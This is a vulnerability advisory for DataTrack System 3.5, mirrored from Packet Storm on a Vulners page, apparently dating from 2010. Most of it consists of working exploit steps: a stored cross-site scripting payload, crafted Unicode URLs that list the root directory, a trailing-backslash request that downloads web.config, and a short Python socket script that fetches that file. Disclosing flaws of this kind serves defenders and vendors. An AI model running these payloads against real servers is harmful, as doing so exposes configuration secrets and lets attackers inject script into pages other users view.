Lucene search
K

DataTrack System 3.5 Cross Site Scripting

🗓️ 19 May 2010 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 14 Views

DataTrack System 3.5 Cross Site Scripting, Directory Disclosure, Configuration Disclosure, Source Disclosur

Code
`#============================================================================================================#  
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #  
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #  
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #  
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #  
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #  
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #  
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #  
# #  
#============================================================================================================#  
# #  
# Vulnerability............Persistent Cross-Site Scripting #  
# Directory Disclosure #  
# Configuration Disclosure #  
# Source Disclosure #  
# Software.................DataTrack System 3.5 #  
# Download.................http://www.magnoware.com/Downloads.aspx #  
# Date.....................5/17/10 #  
# #  
#============================================================================================================#  
# #  
# Site.....................http://cross-site-scripting.blogspot.com/ #  
# [email protected] #  
# #  
#============================================================================================================#  
# #  
# ##Description## #  
# #  
# User submitted data is not HTML entity encoded before it is rendered. #  
# #  
# #  
# ##Exploit## #  
# #  
# Login using the web client and submit a request with summary set to <script>alert(0)</script>. Navigate #  
# to My History to see the result. #  
# #  
#============================================================================================================#  
# #  
# ##Description## #  
# #  
# The contents of the root directory can be listed by using a specially crafted URL. #  
# #  
# #  
# ##Exploit## #  
# #  
# %u0085 #  
# %u00A0 #  
# #  
# #  
# ##Proof of Concept## #  
# #  
# http://localhost/%u0085/ #  
# http://localhost/%u00A0/ #  
# #  
#============================================================================================================#  
# #  
# ##Description## #  
# #  
# Forbidden file types (e.g. ascx, config) can be downloaded by appending a backslash to the filename. #  
# #  
# #  
# ##Exploit## #  
# #  
# GET /web.config\ HTTP/1.1 #  
# Host: localhost #  
# #  
# #  
# ##Proof of Concept## #  
# #  
import socket  
host ='localhost'  
port = 80  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, port))  
s.send('GET /web.config\ HTTP/1.1\r\n'\  
'Host: ' + host + '\r\n\r\n')  
  
while 1:  
response = s.recv(8192)  
if not response: break  
print response  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation